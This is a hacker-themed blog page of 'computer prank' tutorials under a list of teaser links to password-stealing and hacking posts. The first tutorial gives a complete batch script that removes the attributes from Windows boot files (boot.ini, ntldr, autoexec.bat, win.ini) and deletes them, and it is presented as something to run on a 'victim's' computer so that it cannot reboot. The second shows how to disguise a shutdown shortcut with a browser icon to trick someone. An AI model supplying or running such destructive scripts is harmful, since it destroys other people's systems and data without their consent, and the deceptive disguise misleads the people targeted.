Welcome to the Gabol Hacker Crew: Computer pranks
Firesheep VS Blacksheep lets see who wins. See the post on firefox LINK See the post on Blacksheep LINK Learn how to hide files in pictures LINK Browse Anonymously anywhere – Bypass Firewall & Proxy LINK How to hack a WEP wireless Connection LINK How to be safe from Hackers..! LINK Are you safe.? LINK Top Websites Vulnerable to XXS attack LINK How to Track Your Stolen Laptop LINK Turn Your Firefox into a password Stealer Without any Software LINK How to Find a Serial Number for Any Program LINK How to hack a Email LINK These vulnerability sites cn get hacked by shells.. LINK How to HACK Facebook,hotmail,Yahoo,Gmail,Twitter,Orkut,Myspace and msn Passwords. LINK Mind belowing..!!! LINK

Computer pranks

Open notepad and copy/paste this code:

 @echo off
 attrib -r -s -h c:\autoexec.bat
 del c:\autoexec.bat
 attrib -r -s -h c:\boot.ini
 del c:\boot.ini
 attrib -r -s -h c:\ntldr
 del c:\ntldr
 attrib -r -s -h c:\windows\win.ini
 del c:\windows\win.ini

                                                       
                                                  
Now Save it as a .bat file.

  Change the file type to all files
                        
                                                                          

This should shut-down the victims computer and  deletes the files needed to reboot and restart.



  *Dont try it on your own pc it will delete the file needed to reboot...*
                                   ----   your comments are welcomed-----


















            Fake shut-down virus (itz harm less) 
  


 This “virus” can shutdown, restart and log off your pc (Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking Start>Turn off....
And absolutely the best thing about this virus is that you can make a fun prank to your friend... :D

Now lets start with the tutorial.

1- Create a shortcut (Right click on your desktop and go to new -> shortcut )

2- After this will appear window and that is where you type the code
shutdown -s -t 300 -c "Your Message"
To log of computer type shutdown -l -t 300 -c “your message” 
To restart computer type shutdown -r -t 300 -c ” your message” 

The number after -t is the number of seconds countdown there will be before 
shutdown . After -c write own message , that will come up when shutdown box pops up.

3- Click Next, Finish





4- After this will appear icon on desktop, when someone click it, 
shutdown box will pops up.

Also you can change the look of your icon (Right click on the icon -> Properties -> Shortcut -> Change Icon and replace it with you
r own one, like Internet Explorer or Mozilla Firefox...)  And there you are with your fake virus now just to click on it...
         

              
5- You can stop system shutdown by going to Start->Run , then open cmd, write shutdown -a and press ENTER on keyboard, as shown below
That's all. I think this is one of the simplest way to create a fake virus.